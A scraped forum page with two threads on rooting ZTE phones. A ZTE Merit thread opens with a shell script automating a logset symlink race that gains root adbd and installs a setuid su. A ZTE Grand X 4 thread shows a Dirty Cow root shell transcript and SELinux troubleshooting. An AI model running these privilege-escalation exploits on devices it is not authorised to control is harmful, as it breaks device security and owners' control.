adb reboot
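For anyone who wants to script the above: the following is an added example, not jcase's script and not part of chainsdd-su.zip. It drives the same steps (dir setup, opening logset, the rm/ln race against the logger, waiting for /data/local.prop, qemu=1, reboot, su install) with polling instead of eyeballing ls, and finishes with the "-rwsr-sr-x root" permission check that comes up in the replies. Assumptions of mine: adb is on PATH, one device is attached, the su binary is in the current directory, and you press the log set buttons in emode when asked. The ADB variable, the two-stage split and the retry counts are my choices, not from the original procedure.

```shell
#!/bin/sh
# Added example for the ZTE Merit logset symlink method; not jcase's own script.
# Run "sh merit-root.sh stage1" before the reboot and "sh merit-root.sh stage2" after.
# ADB can be pointed at a wrapper (ADB=./fake-adb) to rehearse without a device.
ADB="${ADB:-adb}"
LOGDIR=/data/local/logs/kernel
KLOG=$LOGDIR/log_kernel.txt
PROP=/data/local.prop

dsh() { "$ADB" shell "$@" | tr -d '\r'; }   # strip the CR old adbd appends to every line

# Old toolbox ls reports a missing path as text on the same stream, so match the message.
exists_on_device() {
  out=$(dsh ls "$1" 2>/dev/null)
  case "$out" in
    ""|*"No such file"*) return 1 ;;
    *) return 0 ;;
  esac
}

# poll_until <seconds> <path>: succeed once the path shows up on the device
poll_until() {
  n=$1
  while [ "$n" -gt 0 ]; do
    exists_on_device "$2" && return 0
    n=$((n - 1)); sleep 1
  done
  return 1
}

# is_setuid_root "<ls -l line>": the check from jcase's replies, true only for a
# setuid mode (-rws......) owned by root, e.g. "-rwsr-sr-x root root 22364 ... su"
is_setuid_root() {
  set -- $1
  case "$1" in -rws*) [ "$2" = root ] ;; *) return 1 ;; esac
}

stage1() {
  if exists_on_device /data/local/logs; then
    echo "/data/local/logs already exists; shell may not own it (see the factory-reset note)" >&2
    return 1
  fi
  dsh mkdir /data/local/logs
  dsh mkdir "$LOGDIR"
  dsh am start -a android.intent.action.MAIN -n com.zte.emode/.logset
  echo "Enable log set in the emode activity on the phone; waiting for $KLOG"
  poll_until 120 "$KLOG" || { echo "log_kernel.txt never appeared" >&2; return 1; }
  # Race the logger: remove the file and drop the symlink in its place;
  # retry if logset recreated a regular file before the link landed.
  i=0
  while [ "$i" -lt 10 ]; do
    dsh rm "$KLOG"
    dsh ln -s "$PROP" "$KLOG"
    dsh ls -l "$KLOG" | grep -q -- '->' && break
    i=$((i + 1))
  done
  echo "Waiting for the logger to create $PROP through the symlink"
  poll_until 180 "$PROP" || { echo "$PROP not created; is log set still enabled?" >&2; return 1; }
  echo "Disable log set in emode now, then press Enter"; read -r dummy
  dsh "echo 'ro.kernel.qemu=1' > $PROP"     # the redirection runs on the device
  "$ADB" reboot
}

stage2() {
  "$ADB" wait-for-device
  "$ADB" remount
  "$ADB" push su /system/xbin/su
  dsh chown 0.0 /system/xbin/su
  dsh chmod 06755 /system/xbin/su
  line=$(dsh ls -l /system/xbin/su)
  if is_setuid_root "$line"; then
    echo "su installed: $line"
  else
    echo "su is not setuid root ($line); remount or push failed, repeat stage1" >&2
    return 1
  fi
  dsh rm "$PROP"            # clean up: leaving qemu=1 in place keeps adbd root on every boot
  dsh rm -r /data/local/logs
  "$ADB" reboot
}

case "${1:-}" in
  stage1) stage1 ;;
  stage2) stage2 ;;
  "") ;;                    # no argument: only define the functions
  *) echo "usage: $0 stage1|stage2" >&2; exit 2 ;;
esac
```

The "-rw-rw-rw-" result a couple of people report further down is exactly what the final check catches: the file landed in /system/xbin but chmod 06755 did not stick, which means adbd was not running as root after the reboot and stage1 has to be redone.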
Might Not Work As Expected
I just tried this procedure from JCase at the RootzWiki dot com site with mixed results. The phone is a ZTE Merit Z990G from Straight Talk.
I went through all the steps and everything performed as expected. When I start an app that requires superuser permissions, the app reports that the device has not been properly rooted. I have repeated the process as outlined four times, including downloading the SU file, and have the same results. Titanium Plus, Busy Box Pro and Root Check Basic report that the device is not rooted.
However, a couple of the Google apps - music, movies and reader seem to think the phone is rooted. Any ideas or suggestions will be very appreciated.
bitshifter52 said:
I just tried this procedure from JCase at the RootzWiki dot com site with mixed results. The phone is a ZTE Merit Z990G from Straight Talk.
I went through all the steps and everything performed as expected. When I start an app that requires superuser permissions, the app reports that the device has not been properly rooted. I have repeated the process as outlined four times, including downloading the SU file, and have the same results. Titanium Plus, Busy Box Pro and Root Check Basic report that the device is not rooted.
However, a couple of the Google apps - music, movies and reader seem to think the phone is rooted. Any ideas or suggestions will be very appreciated.
Sounds like bad permissions on su, try
adb shell ls -l /system/xbin/su
If the permissions come out as "-rwsr-sr-x" then you are rooted; try updating su with the Superuser app, or finding a different copy of su.
If the permissions are different or it says it doesn't exist, then you need to repeat the instructions as you missed one or two.
jcase said:
Sounds like bad permissions on su, try
adb shell ls -l /system/xbin/su
If the permissions come out as "-rwsr-sr-x" then you are rooted; try updating su with the Superuser app, or finding a different copy of su.
If the permissions are different or it says it doesn't exist, then you need to repeat the instructions as you missed one or two.
Thank you for the fast response. Here are the permissions for the SU file and based on what you are saying they look good:
C:\SDK>adb shell ls -l /system/xbin/su
-rwsr-sr-x root root 22364 2012-06-17 12:47 su
I have located and downloaded a couple of "su" files from XDA and similar sites and the files are identical. I will continue searching for a different "su" file and see if that makes a difference.
---------- Post added at 06:15 PM ---------- Previous post was at 05:43 PM ----------
bitshifter52 said:
Thank you for the fast response. Here are the permissions for the SU file and based on what you are saying they look good:
C:\SDK>adb shell ls -l /system/xbin/su
-rwsr-sr-x root root 22364 2012-06-17 12:47 su
I have located and downloaded a couple of "su" files from XDA and similar sites and the files are identical. I will continue searching for a different "su" file and see if that makes a difference.
I looked around and did not find any "su" files that were different from what I downloaded according to the root process. Just for grins I copied the "su" file from my Nook Tablet, which is rooted, and tried that file. Sadly, it did not make a difference.
Please let me know if there is any other information I can provide or if you would like me to try something else.
What happens when you open the Superuser app (note this is not supersu) and go to settings/options and attempt to update su?
bitshifter52 said:
Thank you for the fast response. Here are the permissions for the SU file and based on what you are saying they look good:
C:\SDK>adb shell ls -l /system/xbin/su
-rwsr-sr-x root root 22364 2012-06-17 12:47 su
I have located and downloaded a couple of "su" files from XDA and similar sites and the files are identical. I will continue searching for a different "su" file and see if that makes a difference.
---------- Post added at 06:15 PM ---------- Previous post was at 05:43 PM ----------
I looked around and did not find any "su" files that were different from what I downloaded according to the root process. Just for grins I copied the "su" file from my Nook Tablet, which is rooted, and tried that file. Sadly, it did not make a difference.
Please let me know if there is any other information I can provide or if you would like me to try something else.
It Worked - But Don't Know Why...
jcase said:
What happens when you open the Superuser app (note this is not supersu) and go to settings/options and attempt to update su?
I re-installed Superuser and Superuser Elite and now the phone says it's rooted. I've been in IT for over 35 years and it makes me nervous when software "magically" fixes itself. But now that it's working I won't question it and proceed from here. I appreciate your help and your effort.
Cheers
bitshifter52 said:
I re-installed Superuser and Superuser Elite and now the phone says it's rooted. I've been in IT for over 35 years and it makes me nervous when software "magically" fixes itself. But now that it's working I won't question it and proceed from here. I appreciate your help and your effort.
Cheers
Generally you have to run Superuser once to get it to work, I've found, at least with recent builds (or maybe it's recent Android builds).
Problem.
Hello, I have followed this entirely, but at certain parts it says "Access denied". When I tried to check if the kernel log was there it said "access denied", same with some folders.
root or no root
followed steps, ended up with this...
$ ls -l /system/xbin/su
ls -l /system/xbin/su
-rw-rw-rw- root root 22364 2012-07-15 09:25 su
The Superuser app shows all blank under apps and logs; when I try to update it, it says "checking" for a few seconds and then nothing. Also wondering how to do a factory reset, because if I didn't screw the phone up yet, I will. Thanks in advance.
As you can see I'm new here. I'm old and retired and I would love to root my ZTE Merit 2.3.5, but this is over my head.
I was wondering if there's any accomplished phone rooters in the NC area that would be willing to walk me through this or do this for me
I'd be more than willing to make a donation to make this happen,
custom recovery
I was wondering if someone would make a custom recovery for this phone, because the stock recovery is really bad.
Not working
I can't even get past step 2, I have the file installed and unzipped on both my computer and my smart phone. The only thing I can find to put in the codes is command prompt which says "error: device not found" when I type in adb shell. My ZTE Merit phone has very low internal memory due to all the retarded system apps that came on the phone, I would very much like some assistance removing them from my phone. I also downloaded superuser elite onto my phone and it doesn't show up with ANYTHING. The first page says
Superuser v3.1.3(46)
tap to display changelog
elite installed
su binary not found
a check in the box "outdated binary notification"
unchecked box, temp unroot (When tapped it does nothing)
unchecked box ota survival (Again when tapped it does nothing)
I scroll over to the apps section of the program and it says "No apps in list"
What am I doing wrong? This lack of space is quite irritating
Worked!
omg I've wanted to root my phone. Thank you thank you! I thought I would brick my phone at first.
SIM Carrier unlock a ZTE Merit Z990G Straight Talk
I'm currently a T-Mobile prepaid customer and received the Merit from a friend of mine for doing some painting. I have looked for a month now and had a few unlock websites fail at attempting to unlock the phone via the IMEI (which the phone does have). I have attempted to put my T-Mobile SIM in the Merit but there is NO place to enter an unlock code. I really DON'T want to change my service to Straight Talk and would be willing to pay a decent amount to anyone that is capable of unlocking this phone for use with T-Mobile. If you think you have what it takes PM me and I will give you the IMEI and we can work out a deal. I challenge ANYONE to achieve the impossible and get me the unlock code and a way to input it into the phone.
Cannot get local.prop
I have waited 20 minutes after trying to create the local.prop file and it simply won't create it. Any suggestions?
Can't get SU to upload
Hey, I'm new to rooting Android. I get to the point of installing su but Windows keeps telling me "file not found". Would really like some help in fixing this issue. I have put the su file in C:\Android\android-sdk\SU. Up to this point everything works fine.
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
Any help would be really appreciated.
Thanks
Help getting Started
Hey, anyone and everyone that may be online, I have a real quick and probably REALLY EASY question for you... I'm trying to get started rooting my ZTE Merit and I need to find out how to get to, or where to find, the screen where I type in the commands. I already downloaded the chainsdd zip file. So now I'm supposed to get a shell with adb. If someone would be so kind as to point me in the right general direction, I sure would be grateful.
Thanks in advance,
Jason
Not a Damn thing...
Rather sad... I have everything going as it should, all input correct, still no root after the final reboot. I followed every step to a T several times: -rw-rw-rw- grrr. I've rooted many devices, none this big of a pain in the butt!
Used updated su binary on root just for fun...same result
Help plz!
I'm a noob to this but have been messing around with Ubuntu for some time now. Can someone show me step by step how to root my ZTE Merit please? Is there a video tutorial? I tried all the quick methods but they don't work; this one obviously does, judging by this page. Can someone help start me out please? I'm still learning and would love to learn more!
---------- Post added at 08:59 AM ---------- Previous post was at 08:45 AM ----------
Univarseman said:
I can't even get past step 2, I have the file installed and unzipped on both my computer and my smart phone. The only thing I can find to put in the codes is command prompt which says "error: device not found" when I type in adb shell. My ZTE Merit phone has very low internal memory due to all the retarded system apps that came on the phone, I would very much like some assistance removing them from my phone. I also downloaded superuser elite onto my phone and it doesn't show up with ANYTHING. The first page says
Superuser v3.1.3(46)
tap to display changelog
elite installed
su binary not found
a check in the box "outdated binary notification"
unchecked box, temp unroot (When tapped it does nothing)
unchecked box ota survival (Again when tapped it does nothing)
I scroll over to the apps section of the program and it says "No apps in list"
What am I doing wrong? This lack of space is quite irritating
Help me: what's the first step? Then I can get the gears in motion. I have not a clue how to start this, but if I do I can usually figure it out from there.
Start menu
jjflappy said:
Hey Anyone and everyone that may be online, I have a real quick and probably REALLY EASY question for ya... I'm trying to get started Rooting my ZTE Merit and I need to find out how to get to or where to find the screen where I type in the commands. I already downloaded the chainsdd zip file. So now I'm supposed to get shell with adb. If someone would be so kind and put me in the right general direction, I sure would
be grateful.
Thanks in advance,
Jason
Start menu, then type CMD and hit Enter.

ZTE Grand X 4 - Rooting Progress

This thread is made in an effort to root the ZTE Grand X 4 (Z957). At this point I've made some progress by using the Dirty Cow exploit to access a root shell via ADB, but have been unable to install su to the system partition.
Notes: stock rom, no custom recovery.
Exploit method:
Follow the instructions posted by Arinerron on GitHub regarding CVE-2016-5195 (under 10 posts, cannot share direct link)
When successful you will see "root@<device>:/ #" as your shell prompt, however the session will hang after any command. That said, /system/run-as is still updated allowing you to do the following:
$ adb shell
shell@<device>:/ $ run-as
uid run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@<device>:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
you have access to the android system as root within this shell, but this is where I'm getting stuck. I'm not able to find a way to mount the system partition as read/write, and as such unable to install su. Also note that you will need to run the exploit again anytime you reboot the device. I have tried the following methods:
$ adb shell cp /sdcard/Download/su /system/bin/su
cp: /system/bin/su: Read-only file system
root@<device>:/ # mount -o rw,remount /system
mount: Permission denied
adb reboot disemmcwp
#still unable to remount the system partition
At this point I'll share what I've been able to do so far and see if anyone else has ideas for a next step.
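A small triage helper for the "uid 0 but still stuck" state the post above describes. This is an added example and not part of the original post or the timwr/Arinerron exploit code. It takes the `id` line and the `/proc/mounts` text captured from the device and reports two things a practitioner checks before trying to remount: which SELinux domain the root shell is still confined to (uid 0 in u:r:shell:s0 with SELinux enforcing is exactly the "mount: Permission denied" case, since the shell domain has no mount permission on /system), and whether /system is mounted from a device-mapper node (/dev/block/dm-*), which on a stock build means dm-verity and a rw remount of the block device is refused regardless of domain. The id line is the one posted above; the mount lines and the `su`/`init` domain list are constructed for illustration.

```shell
#!/bin/sh
# Added triage helper (not from the thread). Real inputs would be captured with
#   ID_LINE=$(adb shell id); MOUNTS=$(adb shell cat /proc/mounts)
# The samples below are constructed: the id line is from the post above,
# the mount lines are invented to show a dm-verity backed /system.
ID_LINE='uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0'
MOUNTS='rootfs / rootfs ro,seclabel,relatime 0 0
/dev/block/dm-0 /system ext4 ro,seclabel,relatime,data=ordered 0 0
/dev/block/bootdevice/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,data=ordered 0 0'

# selinux_domain "<id line>": print the DOMAIN part of context=u:r:DOMAIN:s0
selinux_domain() {
  ctx=${1##*context=}
  [ "$ctx" != "$1" ] || return 1      # no context field: SELinux not reported
  printf '%s\n' "${ctx%% *}" | cut -d: -f3
}

# system_mount "<mounts text>": print "<device> ro|rw" for the /system entry
system_mount() {
  printf '%s\n' "$1" | while read -r dev mnt _fs opts _rest; do
    [ "$mnt" = /system ] || continue
    case ",$opts," in
      *,ro,*) printf '%s ro\n' "$dev" ;;
      *)      printf '%s rw\n' "$dev" ;;
    esac
    break
  done
}

# verity_backed "<mounts text>": true when /system comes from device-mapper,
# which on a stock build means dm-verity; a rw remount is refused there.
verity_backed() {
  set -- $(system_mount "$1")
  case "${1:-}" in /dev/block/dm-*) return 0 ;; *) return 1 ;; esac
}

# verdict "<id line>": not-root | root | root-confined:<domain>
verdict() {
  uid=${1#uid=}; uid=${uid%%"("*}
  [ "$uid" = 0 ] || { echo not-root; return; }
  dom=$(selinux_domain "$1") || dom=none
  case "$dom" in
    none|su|init) echo root ;;          # no label, or a domain that is allowed to mount
    *) echo "root-confined:$dom" ;;     # uid 0 with SELinux policy still applied
  esac
}

report() {
  echo "verdict:  $(verdict "$1")"
  echo "/system:  $(system_mount "$2")"
  if verity_backed "$2"; then
    echo "note:     /system is on device-mapper (dm-verity); remount rw will not work as-is"
  fi
}

report "$ID_LINE" "$MOUNTS"
```

If the verdict is root-confined, the next useful reads on the device are `getenforce` and the avc denials in `dmesg` when the remount fails, which name the exact permission the shell domain lacks; if /system is on dm-0, even a permissive domain does not get a writable /system without dealing with verity first.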
Have you figured out how to root the z957.
This worked on my ZTE GrandX Max Plus to permanently disable the write protection on the system partition.
Good luck!!
reboot disemmcwp
If you ever want to re-enable being blocked from mounting system rw:
reboot emmcwpenab
Any luck on this root? I am looking to buy a phone on Cricket, but I need one that I can root.
Bump? Would love to see root here!
Bump, I've tried but I also get stuck on the same three methods:
$ adb shell cp /sdcard/Download/su /system/bin/su
cp: /system/bin/su: Read-only file system
root@<device>:/ # mount -o rw,remount /system
mount: Permission denied
adb reboot disemmcwp
#still unable to remount the system partition
Grand X 4
has anyone successfully rooted the grand x ?!
Thought I would post an update: Still no success on my end.
"Rooting" is easy, but breaking out of the SELinux context to do anything is hard. I.e. I expanded on timwr/CVE-2016-5195 by trying to use vikiroot to break out of the u:r:shell:s0 context. To do this, adb push the vikiroot exploit to /data/local/tmp and then use the timwr method to run that exploit as root:
root@<device>:/ # /data/local/tmp/exploit
Unfortunately I could only get the reverse shell to work as a glorified echo. If anyone knows where I could find some c++ code for running a shell in android for me to work off of I'm willing to see how much further I can get in that direction.
As disemmcwp doesn't work I'm wondering if ZTE found a different way to lock down the system partition? Interestingly there is an OEM-specific settings button that is greyed out (find it at *#*#4636#*#*).
I'm running firmware from Wind/Freedom Mobile so I can access the bootloader and unlock it, but I can't install SU or anything from stock. Additionally, there is no TWRP released for this phone yet. I have no idea where to find the board config files for this phone. Without a custom bootloader I'm not sure how to make permanent changes to the rom at this point.
Thanks for your work on this. Stock Rom is pretty clean, but root would be great on this.
I've tried many different ways to root this phone. For weeks, I've tried. Nothing. I personally think that there is no way to, not now at least.
Don't know if this will help but, I found that they lock the bootloader under the developer settings!
Has anyone tried a one click root application like KingoRoot ?
Or is this more for doing it on your own without a service like that?
Previously I had tried a series of one click solutions but I haven't found any that support this device yet. Typically they use the same exploits we've tried to use the hard way
After slacking for awhile I was finally able to poke around some of the internals of the phone in FTM mode using qualcomm developer tools. Lots of nifty things in the embedded file system and plenty of opportunities to flash new boot loaders and roms to the device for those of you who have a locked bootloader, but unfortunately I haven't been able to extract a copy of the stock rom or bootloaders. I'm still lacking the information I need to compile a new one for the phone.
Where I stand:
Can create a root shell, cannot remount system as read/write for permanent root in stock rom.
Can install new boot loader, no twrp or other found for this hardware.
Can compile new twrp, no boardconfig files (handy to avoid bricking your phone)
Can explore EFS and access chip via FTM, not sure how or if possible to download current rom / bootloader from here.
Happy for any tips on what to try next!
Can you tell me which tools you used? I looked at the Qualcomm site and there are plenty to choose from.
If you can get those tools off of the site maybe I'll message you about grabbing a few items on my Christmas list! QPST includes the tools necessary, and the tools to backup the 425 should you accidentally brick your phone (basically impossible to truly brick a qualcomm if you have the right tools). Archive.org has a copy, don't remember where to find the driver pack but you'll need that too (and a windows build).
Read through some notes on Marshmallow and it sounds like you have to remount system from recovery. I'm camping for the next month but will try talking to the TWRP team about porting a bootloader to the phone when I get back.
Let me know if you make any headway!
try this adb command and see if you get a qualcomm serial port after reboot
Code:
adb reboot edl
if that doesn't work try
Code:
adb reboot bootloader
then run the attached
How did you get into diag mode? Just do the temp root method and setprop sys.usb.config diag,adb?
https://freeandroidroot.com/root-zte-grand-x-4/
This page claims to have a root method but does it actually work? I've tried twice with no success.
How's everyone here? I also am awaiting root for this device. It really needs some shine on its mid-levelness. So here is my friend's ZTE Warp 7 work for root. He also got some killer ROMs for the Huawei Ascend XT. He does great work. I'm sure if he had a Grand X 4 he could move this along. This man can get this done. Just a suggestion for all of us. https://forum.xda-developers.com/showpost.php?p=72560392&postcount=246
---------- Post added at 11:31 PM ---------- Previous post was at 11:10 PM ----------
https://forum.xda-developers.com/member.php?u=7934375
Anyone root this phone yet?
Sent from my Z956 using XDA-Developers Legacy app